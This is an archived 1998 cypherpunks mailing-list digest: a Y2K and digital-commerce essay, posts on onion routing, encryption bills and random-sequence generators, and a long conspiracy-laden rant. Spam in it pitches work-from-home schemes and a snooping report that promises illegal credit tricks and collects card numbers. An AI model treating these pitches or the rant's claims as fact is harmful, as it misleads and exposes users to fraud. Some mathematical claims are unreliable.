Which, thinking thinking of robustness, brings me to what I've been doing
the last few days. Pete Loshin, former editor at Byte, former writer of
various excellent how-to books on networking and one of the first surveys
of internet commerce (and one of the founding members of the Digital
Commerce Society of Boston, I might add, :-)), is now editor of Cutter
Publications' "Corporate Internet Strategies" newsletter, which used to be
edited by Ed Yourdon, of American Programmer, Y2K, and much other, fame.

So, when they needed someone on a panel about electronic commerce at
Cutter's "Summit" conference at the Boston Harbor Hotel's Wharf Room
facility this week, someone controversial, they said, Pete said he knew
exactly who to throw into the fray.

It was fun, too. There, in front of a room full of senior IT managers from
big companies and Famous Computer Guys, sitting on a panel on Internet
Commerce, was one of Fidelity's Famous Computer Guys himself, now running
their web technology department. And Pete. And Fidelity's retail
web-marketing guy, and me. Fidelity has 900 billion dollars under
management. 60% of their customer interaction now comes from the web. The
ganglia twitch.

Dropping that $100 billion 1997 internet transaction number, and saying
that it was three orders of magnitude over the estimate didn't faze these
guys. They had seen it happen.

In addition, all of the people with websites I talked to said that they
used SSL to interact with their customers. Almost all of them said that
they used 128 bit encryption. The Mssrs. Fidelity faintly crowed about the
fact. Digital Commerce is Financial Cryptography, so what else is new?

Then, of course, I threw the whole geodesic economy, digital bearer
settlement rant at them, right down to the picomoney as processor food,
micromoney mitochondria bit.

And, of course, they all stood up and threw their dinner rolls at me. It
was great.

That's because I'd been throwing my own dinner rolls, and I'd been been
hinting what I was going to say all week. They even encourage you to heckle
the speakers back with a liberal sprinkling of wireless mikes around the
room.

So every once in a while, I'd pop off with comments like intellectual
property control was impossible, that watermarking only told you who the
code was stolen from not who stole it. Or, why not have cash auctions for
programming deliverables instead of top-down project management, Or,
emergent processes for software were always going to beat "controlled"
processes, Or, passing programmer certification laws in the wake of
whatever Y2K thing happened would be impossible to enforce in a world of
those same anonymous cash settled markets for programming talent. I even
pointed them to the forum-hackers list as proof.

One of my favorite gybes while I was up on the podium to the Fidelity
marketing guy -- who's a nice guy but who's also fighting like crazy right
now to drag Fidelity up the "quality service differentiation" ladder
because Fido can't play least-cost-producer anymore in an eTrade world --
was my claim that eventually most so-called "branded" products would be
reduced to graded fungible commodities, and that the more dependant a
business was on information technology, the faster it would happen to them.

Orthogonality is always more fun than the alternative. And you get lots of
free dinner rolls.

And, of course, after the digital commerce panel and lunch, Ed Yourdon
wrapped it all up with his scary Y2K rant, followed by an appropriately
scary bunch of panelists telling us just how scary all theis Y2K stuff
really was, that Ed had gotten himself on down to Taos, complete with his
own water supply, and that denial was when you lied to yourself and
believed it. Or something.

All of which I now believe more of, just because all these grey-haired
programming aristocrats were nodding sagely about this prospect of
impending doom for us all. Frankly, most of the people who've yammered at
*me* about Y2K were either loons who hoped it would All Fall Down Someday
Soon, or people like Vinnie, who think it's a good idea, if not fun, to
know what to do if it ever does all fall down, but that praying for it
wasn't going to make it so. I'd like to think I'm one of the latter. The
other problem is, I've seen the end of the world coming before. Even
predicted it myself on occasion. Haven't been able to reduce it to
practice, yet, though. That's the reason Gibbon's in my .sig these days.


So, let's get back to Digicash and the Wright Brothers. After hanging out
with a whole bunch of top-down monolithic-system gurus and Y2K folks
yesterday, it seems plausible. And, I'm certain there are lots of people
out there who know lots about both and who hope that Y2K will be the
Chixalub event that will burn off all the database-driven book-entry
dinosaur systems and clear the way for a digital bearer mammalian explosion.

Frankly, I think we're looking at a brushfire, if anything. The lawn will
grow back, but the house won't burn, even if the water does go out for a
bit. That's my story, and I'm sticking to it. Remembering, of course, the
above bit about denial.


But, suppose we *are* talking about the financial equivalent of that great
1970's 30-second short film epic, "Bambi vs. Godzilla", where Bambi is
squashed by a giant green foot (oops, I gave away the plot), and the whole
financial system goes away for a few days. Or a month.

Is there any way to step in with digital bearer settlement as a robust
alternative to book-entry funds transfer? Remember the great bank strike in
Ireland, where everyone just passed around nth-party endorsed checks like
they were money until it was all over? Could we do something like that?
Would David Chaum and company let us do that without suing someone for
infringement? Could they stop us, if the courts are full of Y2K liability
cases? Would the internet still be up? Could we pay our ISPs with digital
bearer certificates to keep them up? How about Iridium and Teledesic, which
are supposed to be up by then?

Once again, ganglia twitch. However, it might be fun to game the idea a
bit, just to scare the neighbors. You know, pay ya all back when the banks
come up?

Well, maybe not. Ed says that the banks, and particularly Wall Street, are
the most prepared of any of us. That makes sense. The half life of
financial software these days is measured in months. For instance, one of
NeXT's biggest markets was in the financial sectors, especially trading
rooms, where any prototype which worked was immediately production code.
They liked NeXT, despite all its other interesting charistics, because you
could do exactly that, and faster than any other development environment.
Of course, if anyone's a poster child for "sell Cadillacs, drive a Chevy,
sell Chevies, drive a Cadillac", it's Steve Jobs. Of course, he sold NeXTs
and got Apples, however that turns out...

Still, it might be worth thinking about, trying to route around the
book-entry financial settlement system as a pre-disaster exercise.

Wright Brothers versus Chixalub, and all that. No, I don't wanna see the
movie...

Cheers,
Bob Hettinga



-----------------
Robert Hettinga (rah@shipwright.com), Philodox
e$, 44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'
The e$ Home Page: http://www.shipwright.com/

--- end forwarded text



-----------------
Robert Hettinga (rah@shipwright.com), Philodox
e$, 44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'
The e$ Home Page: http://www.shipwright.com/




----------------------------------------------------------------------
Where people, networks and money come together: Consult Hyperion
http://www.hyperion.co.uk/                   info@hyperion.co.uk
----------------------------------------------------------------------
Full-Strength Cryptographic Solutions for Worldwide Electronic Commerce
http://www.c2.net/                                   stronghold@c2.net
----------------------------------------------------------------------
Like e$? Help pay for it!
For e$/e$pam sponsorship or donations, <mailto:rah@shipwright.com>
----------------------------------------------------------------------

--- end forwarded text



-----------------
Robert Hettinga (rah@shipwright.com), Philodox
e$, 44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'
The e$ Home Page: http://www.shipwright.com/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: special@teacup.wbvs.com
Date: Mon, 4 May 1998 22:03:53 -0700 (PDT)
To: special@teacup.wbvs.com
Subject: RON JEREMY UNPLUGGED!!!
Message-ID: <199805021349.GAA23554@TEACUP.WBVS.COM>
MIME-Version: 1.0
Content-Type: text/plain


NOTICE...MINORS ARE STRICTLY PROHIBITED!!!!

Get a FREE autographed photo of Adult icon RON JEREMY when you order any video from the premiere adult video web site on the net.  And...with our try before you buy guarantee, you can see over 1,000  hardcore video previews on line.  As an added bonus, buy any two videos and get your choice of a FREE video and the RON JEREMY photograph. No other Web site can make you this offer.

http://208.233.66.150

Offer is for a limited time, so order before May 5, 1998, or you will miss out on this grea t deal.

For the best sexual reference library, visit www.kinkysexacts.com.

///////////////////////////////////////////////////////////////////////////////
If you wish to be removed from future mailings, please reply with the subject
 "Remove" and this software will automatically block you from our future mailings.
////////////////////////////////////////////////////////////////////////////////






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: moneytime@aol.com
Date: Sun, 3 May 1998 05:43:06 -0700 (PDT)
To: millerseld@aol.com
Subject: Make Money Working From Home
Message-ID: <2145871454578>
MIME-Version: 1.0
Content-Type: text/plain


==========================================================
This is a one time mailing and you will not be sent this message again,
we apologize for any inconveinance that this message has caused You
===========================================================

                  DON'T DELAY, START WORKING NOW!! 

SET YOUR OWN HOURS, STAY HOME, NO TRAFFIC, WORK AS MUCH OR AS LITTLE AS YOU
DESIRE, MORE FREE TIME, BECOME FINANCIALLY INDEPENDENT 

                         WELCOME! 

NEED A JOB? WANT TO MAKE $1,500-$4,000 MONTHLY, WORKING PART OR FULL TIME FROM
THE COMFORT OF YOUR HOME? 
ClickHere

Over 200 companies that will provide you with home employment are listed on
this website. The website is divided into many different categories, such as: 

Computer Opportunities                Toys Assembly 

Decorations Assembly                  Sewing

Jewelry Assembly                      Crafts Assembly 

                       Stuffing Envelopes
                          And Many More

Here are some examples of available opportunities:

"You can make between $400-$500 weekly, stuffing sales envelopes for our
company. Make $0.15 for every envelope you stuff for our company. We will
furnish all the supplies. No experience necessary."

"Assemble beautiful beaded bracelets for fun and profit. You will be paid from
$7.25 to $9.75 for every order that meets company's standards. One order
should only take you 15 minutes to assemble. All materials and instructions
are supplied. No experience is necessary. 

"Make beautiful hand-assembled glass beaded earrings at home. There are three
elegant and creative designs to choose from. Basic assembly skills are
required. No experience is necessary. You will be paid $250.00 for each unit
of 25 pairs of earrings made according to the instructions provided. Shipping
costs for each unit are reimbursed."

"Make $180.26 per week assembling small appliance covers. No experience is
necessary. All materials are provided. It is easy and fun to make. Work as
little or as much as you desire. Get paid $100.00 for each set of 20 Towel
holders. Submit only three sets per week. They are easy to assemble. No
experience is necessary."

We are legitimate company providing real home employment opportunities thus we
putting 100% guarantee on our service. 

Using home workers greatly reduces each company's operating expenses and helps
them to reach many more customers then they possibly could by themselves. They
usually pay a certain amount per item or lot assembled. After shipping your
assembled products to the company, they send you a check paying you for your
labor! No selling is required and you can work as much or as little as you
wish.
The list of companies will be updated every month, thus you will have all
information renewed and the list of new companies will be added.

WELL WHAT ARE YOU WAITING FOR?
Please visit us at
ClickHere
And Start Working Now!!!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: arse69@webtv.net (fine asses)
Date: Sun, 3 May 1998 04:05:33 -0700 (PDT)
To: cypherpunks@toad.com
Subject: hello
Message-ID: <199805031105.EAA05339@mailtod-161.iap.bryant.webtv.net>
MIME-Version: 1.0
Content-Type: text/plain


::

Request-Remailing-To: arse69@webtv.net

test




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cioqoaha30@sprynet.com (:-])
Date: Sun, 3 May 1998 07:24:14 -0700 (PDT)
To: cioqoaha30@sprynet.com
Subject: ALERT - Internet Fraud and Spying
Message-ID: <199805034331SAA25713@post.westex.net>
MIME-Version: 1.0
Content-Type: text/plain






ARE YOU BEING INVESTIGATED ?



Learn the Internet tools that are used to investigate you, your 

friends, neighbors, enemies, Employees or anyone else!  My 

huge report "SNOOPING THE INTERNET" of Internet sites 

will give you...


* Thousands of Internet locations to look up people, credit, 

Social security, current or past employment, Driving records, 

medical information, addresses, phone numbers, Maps to city 

locations...



Every day the media (television, radio, and newspapers) are 

full of stories about PERSONAL INFORMATION being used, 

traded, and sold over the Internet... usually without your 

permission or knowledge. 


With my report I show you HOW IT'S DONE!!!
	

It's amazing..

	

Locate a debtor that is hiding, or get help in finding hidden 

assets.



*   Find that old romantic interest.


*   Find e-mail, telephone or address information on just about 

     anyone! Unlisted phone numbers can often be found 

     through some of these sites!!



Perhaps you're working on a family "tree" or history. The 

Internet turns what once was years of work into hours of 

DISCOVERY & INFORMATION.




      Check birth, death, adoption or social security records.


MILITARY

      Check service records of Army, Navy, Air Force or Marine 

      Corps. Find out who's been telling the truth and who's been 

      lying. Perhaps you can uncover the next lying politician!!!
 


FELLOW EMPLOYEES;


* Find out if your fellow employee was jailed on sex charges, 

or has other "skeletons" in the closet!!



PERFORM BACKGROUND CHECKS;
  
   Check credit, driving or criminal records, Verify income or 

   educational claims, Find out Military history and discipline, 

   previous political affiliations, etc.


YOUR KID'S FRIENDS;


   Find out the background of your children's friends & dates.


WHAT'S THE LAW? STOP GUESSING!!


* Look up laws, direct from law libraries around the world. Is 

  that new business plan legal?? 


NEW JOB?  NEW TOWN?  NEW LIFE?


   Employment ads from around the world can be found on the 

   Internet. Get a new job and disappear!



The Internet can tell you just about ANYTHING, if you know 

WHERE to look. 



BONUS REPORT!!!!


Check your credit report and use the Internet to force credit 

bureaus to remove derogatory information. My special

BONUS REPORT included as part of the "SNOOPING THE 

INTERNET" collection reveals all sorts of credit tricks, legal

and for "information purposes only" some of the ILLEGAL 

tricks.


Research YOURSELF first!


What you find will scare you.


If you believe that the information that is compiled on you 

should be as easily available to you as it is to those who 

compile it, then. . .

You want to order the SNOOPING 

THE INTERNET report.


This huge report is WHERE YOU START! Once you 

locate these FREE private, college and government 

web sites, you'll find even MORE links to information 

search engines!

YOU CAN FIND OUT ANYTHING ABOUT ANYBODY 

ANY TIME using the Internet!!!!

SEVERAL WAYS TO ORDER !!!


  1) WE TAKE:  AMERICAN EXPRESS OR
    
                          VISA <> MASTERCARD
 
        TYPE OF CARD  AMX / VISA / MC??_______________

        EXPIRATION DATE   ___________________________
 
        NAME ON CREDIT CARD________________________
 
       CREDIT CARD #________________________________
 
        BILLING ADDRESS ____________________________
 
        CITY_________________________________________
 
        STATE________________ZIP_____________________
 
        PHONE INCLUDE AREA CODE___________________
 
        WE WILL BILL 39.95 to your account

        SHIPPING  COST OF 3.00 FIRST CLASS MAIL

        SHIPPING COST OF  15.00  24 HOUR EXPRESS MAIL
 
        SALES TAX (2.90) added to CA residents 
 
  >>> Send $39.95 ($42.85 in CA) cash, check or money

order to:

  >>> CASINO CHICO
  >>> Background Investigations Division
  >>> 311 Nord Ave.
  >>> P.O. Box 4331
  >>> Chico, CA 95927-4331


  2) Send the same above requested credit card 

information to above address. 


   3) Fax the same above credit card information to 530-895-

8470

   4) Call phone # 530-876-4285.  This is a 24 hour phone 

number to place a CREDIT CARD order.

   5) FAX A COPY of your signed check to 530-895-8470.

       This is an EXCELLENT way to order without a credit card!

    
 I will RUSH back to you SAME DAY my "SNOOPING 

THE INTERNET" report!

Log on to the Internet and in moments you will fully 

understand...

 What information is available -- and exact Internet 

site to get there!

2nd BONUS!!!!


Along with the report we will send a 3 1/2" disk with 

sites already "HOT LINKED". No need to type in 

those addresses. Simply click on the URL address 

and "PRESTO" you are at the web site!!! 


Personal ads, logs of personal e-mail, mention of 

individuals anywhere on the Internet are "yours for the 

taking" with this report.


Lists of resources to find even more information 

(private Investigation companies, etc..) 


Order surveillance equipment (if legal in your state)
  

Send anonymous e-mail
   
Research companies 

Research technology

Locate military records

 
FIND INFORMATION ON CRIMINALS 

   Find Wanted fugitives - perhaps even a close 

associate!

ABSOLUTE SATISFACTION GUARANTEED:

Your satisfaction is 100% guaranteed, just return the material for a full refund within 30 days if you aren't 100% satisfied.

This offer is from a private company. Casino Chico / R Jon Scott Hall publications is not associated with or endorsed by, AOL,
MSN, or any other Internet service provider.

Copyright 1997 All Rights Reserved

R Jon Scott Hall Publications. 









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tnelson222@mci2000.com
Date: Sun, 3 May 1998 22:29:05 -0700 (PDT)
Subject: Earn $100 every time OUR phone rings....
Message-ID: <199805040528.WAA22430@cygint.cygnus.com>
MIME-Version: 1.0
Content-Type: text/plain


ALL YOU DO IS ADVERTISE OUR 800 NUMBER! THAT'S ALL!! 

$100 goes to you for every sale that we close!

We need you to make our phone ring......

I am not talking about MLM! Does the idea of making at least 
$1,500 per week beginning your 2nd week of doing business excite you? 

How about never having to sell a thing to your customer to make money?

I MADE OVER $1,000 MY FIRST WEEK! MY SECOND WEEK, I MADE OVER $1,800....

Does this excite you?  It certainly excites me considering I only 
put in 4 hours or less per week to generate this kind of revenue.  

If you are an average person like myself who has always desired to be 
in business for themselves and absolutely doesn't like selling or having
to talk to people to make a living, then this is for you.
Every aspect of selling or talking to someone is done completely by the company.  

I DO NOT TOUCH THE TELEPHONE AND NEITHER WOULD YOU! 

First, Our Promise To You:
1) NO Selling!
2) NO Talking or Personal Contact with others, on the phone or in person!
3) NO Mandatory mailing of postcards, products or information to prospects!
4) NO Prospecting or Cold Calling of any kind!

ALL OF THIS IS DONE BY THE COMPANY!!!

WHAT THIS BUSINESS WILL DO FOR YOU:

* Handles all your calls, closes your sales, and 
  sends you WEEKLY commission checks! 

* It pays you a $100 commission (that's over 50% of the total sale)
  for EVERY sale. CHECKS put $$$ in your pocket in less than your first 
  week or two... Quick commission earnings build and maintain motivation. 
  ALL YOU DO IS ADVERTISE the toll-free number and your ID number. 

* You can get STARTED TODAY. Just advertise the business toll-free 
  number with your ID # and let this business CLOSE YOUR SALES every day...
  We do all the work and YOU GET PAID FOR IT! 

* You may advertise any way you choose: Bulk E-Mail, Flyers, Classifieds, 
  Postcards, etc. Suppose you use bulk E-Mail, as I am: 100,000 E-Mails
  with a 1/10 of a percent (0.1%) sales rate at $100 per sale nets 
  $10,000... not too bad.

There is nothing else out there that will provide you with an immediate income 
beginning THIS WEEK with minimal effort.

Before you call, I want you to think about the quality of the live 
operators handling your call. I am convinced you will not find 
a better team of closers for your own personal sales.  You will 
clearly understand what I am talking about once you call.  

PLEASE DON'T LET THIS PASS YOU BY. MAKE THE CALL!!

1-800-811-2141

You will be asked for ID #50030 when you call.

(Live operators are available from 8 AM-10 PM CST Monday through Saturday and 
will be able to answer any questions you may have.)

Call one of the 24hr TESTIMONIAL lines at 888-703-5389, 888-446-6949 or 888-731-3457 
(all toll free). 
 
 
 
 
 
 
 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sun, 3 May 1998 23:50:43 -0700 (PDT)
To: David Honig <cypherpunks@toad.com
Subject: Re: Why does the Navy research onion routing?
In-Reply-To: <3.0.5.32.19980429090405.0079b940@otc.net>
Message-ID: <3.0.5.32.19980503230738.009147c0@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:04 AM 4/29/98 -0700, David Honig wrote:
>Why does the Navy research onion routing?
>
>Only reason I can think of is so that .mil can 
>study other sites anonymously, or communicate
>amongst themselves using anonymous-routing-tech
>to avoid traffic analysis.
>
>The other practical possibility is that they're happy
>to have smart CS people and will fund whatever they
>want to do, just to keep them.

There is some of the latter involved, but the military
does have times they'd like to check out web pages
without traffic analysis, just as they'd like
to be order lots of pizza without folks figuring out
that they're up to something.  This includes several cases -
using the public or civilian-government internet,
and also using their own intranets which may be less
than totally secure.
				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Sun, 3 May 1998 23:21:11 -0700 (PDT)
To: cypherpunks
Subject: Bills in Congress containing "encrypt"...
Message-ID: <199805040621.XAA20536@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


I found a few interesting ones.

S. 1023

Making appropriations for the Treasury Department, the United States
Postal Service, the Executive Office of the President, and certain
Independent Agencies...

	$3,000,000 shall be available to the Financial Crimes Enforcement
       Network, including $2,000,000 for the money laundering threat initiative
       and $1,000,000 for the Secure Outreach/Encrypted Transmission Program;

	$7,800,000 for automated license plate readers,

[The above bill seems to have evolved into the following, which was
passed by the House and Senate and awaits the President's signature.]

H.R.2378 
Making appropriations for the Treasury Department, the United States
Postal Service, the Executive Office of the President, and certain
Independent Agencies, for the fiscal year ending September 30, 1998,

	$1,000,000 shall be available
       to the Financial Crimes Enforcement Network for the Secure
       Outreach/Encrypted Transmission Program; 

	...to the United States Secret Service, including ...
       $1,460,000 to provide technical assistance and to
       assess the effectiveness of new technology intended to combat
       identity-based crimes, 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill payne <billp@nmol.com>
Date: Mon, 4 May 1998 07:01:06 -0700 (PDT)
To: inter@technologist.com
Subject: Periods of sequences
Message-ID: <354DC8CA.5D34@nmol.com>
MIME-Version: 1.0
Content-Type: text/plain


Monday 5/4/98 7:22 AM

chambers,

Your statement

  The advantages are a lack of mathematical structure which might
provide an entry for the  
  cryptanalyst, and a huge choice of possibilities; the disadvantages
are that there are no    
  guarantees on anything, and as is well known there is a risk of
getting a very short  period. 

made at http://www.jya.com/a5-hack.htm#wgc stuck me as profound.

Reason is that NSA cryptomathematician Scott Judy once told me that I
did not really
understand the principles NSA uses for its crypto algorithm.

Judy proceeded to explain to me that NSA bases its crypto algorithm on
complication,
not mathematics.

Judy apparently did not realize that some years previous NSA employee
Brian Snow showed
us about all of NSA's KG schematics.  And their field failure records!

Masanori Fushimi in Random number generation with the recursion x[t] =
x[x-3q]+
x[t-3q],Journal of Applied Mathematics 31 (1990) 105-118 implements a
gfsr
with period 2^521 - l. http://av.yahoo.com/bin/query?p=gfsr&hc=0&hs=0

Fushimi's generator is sold by Visual Numerics.

Fushimi's implementation is very well tested.  And worked SO WELL that
Visual
Numerics numerical analyst Richard Hanson had TO BREAK IT!

Reason was that the gfsr produces true zeros.  This caused simulation
programs
to crash from division by zero.

None of the linear congruential generators produced zeros so the problem
did
not arise until the gfsr was used.

Hanson ORed in a low-order 1 to fix the problem

Masanori wrote,

  Lewis and Payne [16] introduced an apparely different type of
generator,
  the generalized feed back shift register (GFSR), by which numbers are
formed by 
  phase-shifted elements along a M-sequence based on a primitive
trinomial 1 +
  z^q + z^p.

Lewis was one of my former ms and phd students.
http://www.friction-free-economy.com/

Cycle lengths of sequences is a fascinating topic.

Let me point you guys to a delightful article on the distribution of
terminal digits of transcendental numbers.

  The Mountains of pi by Richard Preston, v68 The New Yorker,
  March 2, 1992 p 36(21).

This is a story about Russian-born mathematicians Gregory and
David Chudnowsky.

While the story is fun to read, I think that the Chudnowsky's were
wasting their time.

I think that terminal digits of transcendental numbers have been
proved to be uniformly distributed.

    Sobolewski, J. S., and W. H. Payne, Pseudonoise with
    Arbitrary Amplitude Distribution:  Part I:  Theory,
    IEEE Transactions On Computers, 21 (1972): 337-345. 
                   
    Sobolewski, J. S., and W. H. Payne, Pseudonoise with
    Arbitrary Amplitude Distribution:  Park II:  Hardware
    Implementation, IEEE Transactions on Computers, 21
    (1972): 346-352. 

Sobolewski is another of my former phd students.

Hopefully you guys will read judge Santiago Campos' 56 page 
MEMORANDUM OPINION AND ORDER on the Payne and Morales lawsuit 
on jya.com within several days.

I made a copy and gave it to Sobolewski on Sunday afternoon.

I want Sobolewski's opinion on what Morales and I should do.

Soblewski lives about two miles from us.

Sobloweski is an administrator [vp of computing at university
of new mexico] and knows how administrators think.

Let's hope this UNFORTUNATE mess involving shift register sequences
gets settled.

But let's not forget our sense of humors despite the about .5 million
dead Iranians.  

Hopefully the system will take care of the guys that did that did the
Iranians.

Masanori wrote,

  The GFSR sequence as well as the Tausworthe sequence can be
  constructed using any M-sequence whether the characteristic polynomial
  is trinomial or not;...

Jim Durham, my seismic data authenticator project leader, retired from
Sandia.

Durham gave me a number of tech reports upon his retirement.

One was authored by Robert TITSWORTHE of jpl.

TITSWORTHE changed his name!

Later
guys






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: TruthMonger <tm@algebra.com>
Date: Mon, 4 May 1998 10:53:08 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Epic Log - SPACE ALIENS HIDE MY DRUGS!!!
Message-ID: <354DFE20.531F@algebra.com>
MIME-Version: 1.0
Content-Type: text/plain


Epic Log Rolling - SPACE ALIENS HIDE MY DRUGS!!!
________________________________________________

Dimitry, cleverly trying to distract me from my plan to....
(Damn! It worked...) wrote:

That was your best one yet, my friend.  Well done.  Do you invent as you 
type 
or do you prepare first?  Do you dream the ideas in progress or 
summarize a 
day of dreaming all at once? 

  After being diagnosed with Tourette Syndrome and ADHD, it took 
me somewhere between 6-18 months to get around to seeing a doctor
in regard to treatment. So I guess you could say that 'plans' and
'preparation' are not my strong point.
  A year or so ago I unexplicably began to write a work called,
'Soul Chaser.' I had absolutely no idea what it was about or
where it was going, and it drove me crazy waiting for each 
chapter to 'appear' so that I could find out what was going
to happen. 

  While 'The True Story of the InterNet' manuscripts are created
with a purpose in mind, they tend to form themselves out of a 
mountain of notes jotted to myself in regard to the types of things
that force their way into one's mind while lying sleepless at 4 a.m.
  An integral part of the manuscripts is the insertion of details
or concepts which are sent to me for inclusion by a variety of 
shadowy characters, some of whom I am somewhat familiar with, and
some who remain a total mystery to me. An example would be the
references to Mule Shoe, Texas as the location of one of the 
underground Reptilian Nazi bunkers (along with LizardMoor and
Lost Alamo).
 I added Mule Shoe to the list as a result of a mystery request
and have no idea what is being inferred, but a number of CoE
initiates have reported that they have observed a great deal of
concern among certain government organizations about the possible
compromise of some mysterious project, or somesuch. As a matter
of fact, a few thanked me profusely for the 'pointer' even though 
they gave me no indication as to what they have uncovered.


Granted I've not seen anything relevant to cryptography yet, but I'm not 
about 
to complain. 

  Cryptography = Privacy = Rights = Freedom = Ad Infinitum

   Once the possibilty of extinction of all life from the face
of the earth by Nuclear Technology became a *REALITY*, then
the scope of many formerly local/regional/national issues and
interests became considerably wider/larger.
  Now that the possibility of extinction of all privacy from 
the face of the earth by Digital Technology (Can you say
'ECHELON'? Sure you can...) has become a *REALITY*, the scope
of many local/global issues and interests have acquired a
level of meaning which goes far beyond the particular sphere
in which they currently are being debated/instituted.
  We have recently seen how local pornography laws in the 
Deep South can affect the lives of people living locally in
California and globally in CyberSpace. We are currently moving
toward the same issues and concepts applying internationally.

  What about the reporter who is currently facing imprisonment
for investigating the Truth in regard to child pornography on
the InterNet, instead of accepting at face value the 'handouts'
from the Privacy Pirates? Anyone who fails to see implications
for freedom, privacy and cryptography needs to spend a little
less time watching 'Gilligan's Island'.

  I may soon be facing the same situation in Canada, with the
main difference being that the 'Bienfait Nutly News' doesn't
carry the same type of clout as the organizations considered
by people wearing suits as members of the 'legitimate press'.
  When I protected all files that I didn't want to fall into
the possession of the Royal (pain in the ass) Canadian (beaver,
hee...hee) Mounted (on the citizen's behind) Police (gestapo),
I made a point of leaving on my hard drive, among other things,
a 'pornography file' which I sent to the CypherPunks list, the
WhiteHouse, etc., with the announcement that I was purposely
distributing vile, filthy pornography that was an affront to
every decent person on the face of the earth.
  Anyone who took the trouble to break the encrypted file
would have found that it was a classic Greek(?) statue of
a young boy, with his <gasp><horror> PENIS exposed for God
and everybody to see. I truly believe that my digital 
transmission of this classic work of art makes me, under 
current law, a child pornographer, even though the only way
for anyone to view it would be to crack the encryption on
the file.
(Thus far, God has not contacted me to express having a
 problem with my actions, but I suspect that those who
 have taken it upon themselves to express the opinions
 of 'everybody' will soon be in contact.)


Thanks for the entertainment. 
 
 'Entertainment' is the *Medium*, not the *Message*, of 'The
True Story of the InterNet' manuscripts.
  It is a Medium which has lessened, though not removed, the
consequences which go hand-in-hand with the dissemination of
Truths which meet the high standards expressed by a line in 
a movie..."You can't *HANDLE* the Truth!"

  Jim Bell was taken down a few hours after I had sent him a
copy of a TSotI chapter describing 'Assassination Politics',
and asking his opinion on certain things. (The *only* time
I have ever done this.)
  I took the Jim Bell events to be a clear message that the
rules had changed in regard to the dissemination of the TSXotI
manuscripts. I did not regard the chapter as 'entertainment'.
 (I fully recognize the possibility that I may be wrong or
 'overreacting' to the synchronicity of the two events, but,
 on the other hand, I have the perspective of having observed
 this type of 'synchronocity' since 1989, and have had my
 sorry ass 'saved' by my 'unreasonable paranoia' many times
 since then.)

  I left home two weeks before gomez was cut loose from a 
company he had founded, after seventeen years, in order to 
arrive the day before he, himself, received the 'news'.
  I received the information regarding his elimination from 
the CoE equation via a source who still remains a mystery to
me after almost a decade of cross-communication.
  I gave the situation only the briefest of mentions in the
TSotI manuscripts, because CoE initiates would have no problem
with immediately recognizing the import of the event.
  I did not consider that chapter to be 'entertainment'.

  Many initiates of the Circle of Eunuchs have recently 'gone 
to ground', in order to work unobserved in a manner which they
feel they can be most effective. Other CoE initiates have 
stepped forward to accentuate the policies and actions that
they have been involved in more surrupticiously until now,
even though it may well expose them to retribution, because
they feel that that is how they can be most effective.
  I have given brief mention to some of the results of the
directions some of these CoE initiates have taken in various
chapters of the TSotI manuscripts, and I do not consider 
these chapters 'entertainment'.

  I recently received information in regard to the intentions
of the Beaver Bullys to slap their tails down on my sorry butt,
and had the option of heading for sandier pastures (Tucson), or
covering my ass as much as possible and saying, "Damn the 
torpedos, full Speed, Ritalin and Prozac ahead!"
  I chose to do the latter, and have written a bit about it
in the TSotI manuscripts. I *do* consider those chapters to
be (my) 'entertainment', because 'picking guitar while Rome
burns' is the only dance there is...

  Maybe I'm crazy (maybe?...hee, hee), but if I had the 
opportunity to travel back in time and *become* Lee Harvey
Oswald, I would do so. Can you imagine actually *knowing*
the Truth behind what most of us can only specualate about,
even though the events surrounding his role/non-role in the
assassination of JFK are of monumental import to our times
and the *REAL* history of our globe?

  I have no idea whether or not the Oppressors who have
'legally stolen' my computers will be foolish enough to
attempt to take me down within the boundaries of the
current legal system, but I can guarantee that, if they
do, myself and others will learn more about what is truly
going on in the background of 'currently perceived reality'
than Lee Harvey Oswald ever dreamed of knowing.
  There are 'tricks and traps' embedded in the information 
that I *ALLOWED* the Oppressors to confiscate that are the
result of almost a decade of preparation. Anyone who thinks
I am 'blowing smoke' failed to read and understand the portion
of 'WebWorld & the Mythical Circle of Eunuchs' which detailed
the concept of "Winner's Bluff."
  "TV IS REAL!" (And so is 'Uncle Bubba'...)

Thought For The Day:
  Which 'side' do you, personally, take in regard to the debate
as to whether there is, or is not, a Grand Conspiracy taking
place in the BackGround Of Reality?

  The fact of the matter is, it doesn't really matter.
  The existence or non-existence of the Grand Conspiracy is
of no more importance than the existence or non-existence
of the Circle of Eunuchs.

Definition of Reality:
  "If you can put it in the bank, it's Real!"
~ Stuart Wilde (misquote)

'Theory of Black Holes' Versus 'Infield Fly Rule':
  If some scientific genius proves the invalidity of Einstien's
theories, then can we expect the victims of Hiroshima and
Nagasaki to spring back to life?
  If everyone on the face of the earth, except for baseball
umpires, agree to invalidate the Infield Fly Rule, does it
really matter?

  Are the 'True Story of the InterNet' manuscripts 'entertainment'?
  Sure. "His login is PANIC, His password is CRASH, When Time is
of Essence, He'll Rise from the Ash" was just a 'lucky guess' as
